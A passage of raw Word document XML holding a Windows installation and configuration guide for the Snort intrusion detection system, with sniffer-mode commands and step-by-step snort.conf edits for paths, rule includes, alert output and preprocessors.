        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="640"/>
          <w:tab w:val="left" w:pos="6246"/>
        </w:tabs>
        <w:spacing w:before="43" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="1161" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>“snort.conf”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“etc”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extracted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>folder.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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into “C:\Snort\etc” folder. Overwrite any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>existing file.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remember if you modify your snort.conf file and download a new file, you must modify it for Snort to work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0DFCE7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="638"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="1682" w:firstLine="0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10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(cmd.exe)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navigate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folder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>“C:\Snort\bin”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at the Prompt, type cd\snort\bin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AC00AF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="638"/>
        </w:tabs>
        <w:spacing w:before="2"/>
        <w:ind w:left="638" w:hanging="278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(execute)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>snort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sniffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mode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command: snort -dev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-i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA32074" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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number.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40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number.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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7"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C20C4AE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6121"/>
        </w:tabs>
        <w:spacing w:before="39" w:line="561" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="4068" w:firstLine="69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700CC106" wp14:editId="3455FA18">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>933450</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>640517</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5922390" cy="2947035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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-dev is used to run snort to capture packets on your network. To check the interface list,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>use following command: snort</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>-w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00260614" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="561" w:lineRule="auto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C3EFF4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="222"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Finding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interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D93071" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57244E3E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="917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Microsoft.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="38"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>As you can see in the above example, the other interfaces are for VMWare.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>My interface is 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DA8FA5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="47"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C56EBB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="638"/>
        </w:tabs>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="1737" w:firstLine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snort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IDS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mode,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“snort.conf”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>according to your network environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1635C1D8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="777"/>
        </w:tabs>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="1477" w:firstLine="0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specify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snort.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>file,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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following line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275A4101" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>HOME_NET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.1.0/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="63"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(You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normally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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-2"/>
        </w:rPr>
        <w:t>here)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7C8C6B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="777"/>
        </w:tabs>
        <w:spacing w:before="57" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="1400" w:firstLine="0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want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addresses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DNS_SERVERS,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network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6123C288" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33EAB732" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E82C032" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="96"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09141F80" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360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snort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6409231A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="430"/>
          <w:tab w:val="left" w:pos="780"/>
        </w:tabs>
        <w:spacing w:before="50" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="430" w:right="3388" w:hanging="70"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Change the RULE_PATH variable to the path of rules folder. var RULE_PATH c:\snort\rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D947FBA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F4CFE5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>path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rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED86F6A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="780"/>
          <w:tab w:val="left" w:pos="3502"/>
        </w:tabs>
        <w:spacing w:before="50" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="1176" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24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library</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr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must change the path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">of snort_dynamicpreprocessorvariable. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>C:\Snort\lib\snort_dynamiccpreprocessor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60370C93" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5749"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="899"/>
      </w:pPr>
      <w:r>
        <w:t>You need to do this to all library files in the “C:\Snort\lib” folder. The old path might be: “/usr/local/lib/…”. you will need to</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>replace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path. Using C:\Snort\lib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEA3FCA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="780"/>
        </w:tabs>
        <w:spacing w:before="2" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="2046" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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“dynamicengine”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“snort.conf”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file.. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E00CC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:ind w:left="430"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>dynamicengine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>C:\Snort\lib\snort_dynamicengine\sf_engine.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139178D7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="231" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="499" w:right="1143" w:hanging="140"/>
      </w:pPr>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12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“include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>classification.config”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“include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>reference.config”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>files. include c:\snort\etc\classification.config include</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED584B4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="272" w:lineRule="exact"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>c:\snort\etc\reference.config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7050DADC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="430"/>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
        <w:spacing w:before="42" w:line="295" w:lineRule="auto"/>
        <w:ind w:right="1374" w:hanging="70"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remove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(#)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ICMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rules,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commented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#. include $RULE_PATH/icmp.rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E91238" w14:textId="77777777" w:rsidR="00A16F4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line="304" w:lineRule="exact"/>
        <w:ind w:left="777" w:hanging="417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ICMP-info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comment,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506CE88D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>commented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D224CE0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="80"/>
        <w:ind w:left="430"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>$RULE_PATH/icmp-info.rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EC1D8B" w14:textId="77777777" w:rsidR="00A16F4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51" w:line="266" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="1640" w:firstLine="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alerts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snort,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="38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“output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>log”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in snort.conf and add the following line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28363431" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="51"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>alert_fast:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>snort-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>alerts.ids</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427CF559" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText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DD1DFD" w14:textId="77777777" w:rsidR="00A16F47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75"/>
        <w:ind w:left="849" w:hanging="489"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(add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#)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whitelist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>$WHITE_LIST_PATH/white_list.rules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blacklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D457C4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5437C069" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360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nested_ip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, \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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nested_ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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 xml:space="preserve">#, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DD5D8C" w14:textId="77777777" w:rsidR="00A16F47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49"/>
        <w:ind w:left="779" w:hanging="419"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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(#)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lines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5AC928" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="39"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>#preprocessor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>normalize_ip4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E3E2C5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="51" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="5229"/>
      </w:pPr>
      <w:r>
        <w:t>#preprocessor normalize_tcp: ips ecn stream #preprocessor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>normalize_icmp4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">#preprocessor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>normalize_ip6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7F4DE0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="274" w:lineRule="exact"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>#preprocessor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>normalize_icmp6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DB4799" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="95"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B566C0F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
        <w:ind w:left="779" w:hanging="419"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Save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“snort.conf”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7D7C4D1E" w14:textId="77777777" w:rsidR="00A16F47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40"/>
        <w:ind w:left="777" w:hanging="417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start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>snort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  <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mode,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24A777A7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="90"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A60FF8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="4139"/>
      </w:pPr>
      <w:r>
        <w:t>snort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>c:\snort\etc\snort.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>c:\snort\log</w:t>
      </w:r>
      <w:r>
